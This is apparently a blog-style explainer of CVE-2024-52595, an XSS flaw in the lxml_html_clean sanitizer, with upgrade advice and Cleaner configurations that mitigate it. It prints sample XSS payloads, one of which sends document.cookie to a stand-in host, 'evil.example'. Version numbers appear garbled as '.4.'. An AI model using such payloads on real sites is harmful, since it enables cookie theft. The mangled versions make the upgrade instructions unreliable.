CVE-2024-52595 - XSS Vulnerability in lxml_html_clean’s HTML Sanitization

CVE-2024-52595 is a critical security vulnerability affecting the lxml_html_clean project, which is commonly used to sanitize HTML content in Python applications. If your application allows users to input HTML and you use this tool to clean it, you could be at risk—hackers might inject JavaScript and compromise your site's security, all due to how certain HTML tags are parsed and sanitized.

In this article, we’ll explore in simple terms how this vulnerability works, what attackers can do, and how you can protect yourself with examples and practical code.

What Is lxml_html_clean?

lxml_html_clean is a Python package that provides the HTML cleaning features originally from lxml.html.clean. It is designed to strip out unwanted tags, attributes, and scripts from untrusted HTML, making it safe to display as user-generated content on your site or app.

Problem: Prior to version .4., lxml_html_clean has a crucial flaw in how it parses special HTML tags, such as <svg>, <math>, and <noscript>. The tool does not handle "context-switching" inside these tags the way a real web browser does. Worse, it doesn’t properly filter out potentially malicious JavaScript in some edge cases.

Context-Switching Explained

When a web browser parses HTML and encounters special tags like <svg> or <math>, it can switch parsing *modes* because those tags belong to different "namespaces." This allows attackers to sneak in JavaScript or other dangerous content using browser parsing quirks.

CSS comments inside these tags can hide scripts or active content. Browsers and lxml_html_clean interpret these comments differently. While the cleaning function skips over them, the browser may *not*—causing malicious code to be executed.

Let’s say you clean this HTML input from a user using lxml_html_clean before version .4.

<svg>
  <script><!--
    alert('XSS');
  //--></script>
</svg>

- lxml_html_clean: Ignores the content inside the comment, believes it is safe, and outputs the same HTML.
- Browser: Reads the <script>, executes the code inside the comment, and shows a popup alert. Attack successful—XSS (Cross-Site Scripting).

Exploit Flow

1. Attacker submits HTML containing <svg>, <math>, or <noscript> tags, often embedding JavaScript in sneaky ways.
2. lxml_html_clean processes the content, doesn't properly switch parsing context, and outputs HTML as if it's safe.
3. Browser reads the page, but interprets the special tags per modern web standards, executing scripts that lxml_html_clean missed.

Input HTML

<svg><script><!--
alert('XSS')
//--></script></svg>

The sanitizer lets it through, but in the browser, the script runs.

Example 2: Using MathML

<math><script>window.location='https://evil.example/steal?cookie='+document.cookie</script></math>;

Same problem—sanitizer misses the script, browser executes it.

Example 3: Noscript Trick

<noscript><img src="x" onerror="alert('XSS from noscript')"></noscript>

Depending on how sanitization is configured, this might sneak through.

1. Update lxml_html_clean to at least .4.

The new version fixes CVE-2024-52595. Upgrade now:

pip install -U lxml-html-clean

2. Temporary Mitigations: Cleaner Configuration

If you *cannot* upgrade immediately, you can strongly limit what tags are allowed or how they're handled.

Example: Using allow_tags to Block Malicious Tags

from lxml_html_clean import Cleaner

# Allow only safe tags, none of svg, math, noscript
SAFELIST = ['b', 'em', 'i', 'strong', 'p']

cleaner = Cleaner(
    allow_tags=SAFELIST  # Block all other tags
)
dirty_html = "<svg><script>alert(1)</script></svg><b>Safe</b>"
clean_html = cleaner.clean_html(dirty_html)
print(clean_html)
# Output: <b>Safe</b>

Example: Using kill_tags for SVG, Math, Noscript

from lxml_html_clean import Cleaner

cleaner = Cleaner(
    kill_tags=['svg', 'math', 'noscript']
)
dirty_html = "<svg><script>alert(1)</script></svg><p>Hello!</p>"
clean_html = cleaner.clean_html(dirty_html)
print(clean_html)
# Output: <p>Hello!</p>

Summary Table

| Action | Safety |
|--------------------|-------------------------|
| Still using <.4. | Vulnerable to XSS |
| Upgraded to .4. | Protected |
| Using allow_tags | Safer but not perfect |
| Using kill_tags | Safer but not perfect |

Double-check your cleaning settings and do not trust default behavior blindly.

- For more details, see the original advisory and the project changelog.

References

- Official CVE report
- lxml_html_clean PyPI
- lxml_html_clean GitHub
- Release v.4. - Changelog

Timeline

Published on: 11/19/2024 22:15:21 UTC
Last modified on: 11/25/2024 14:27:38 UTC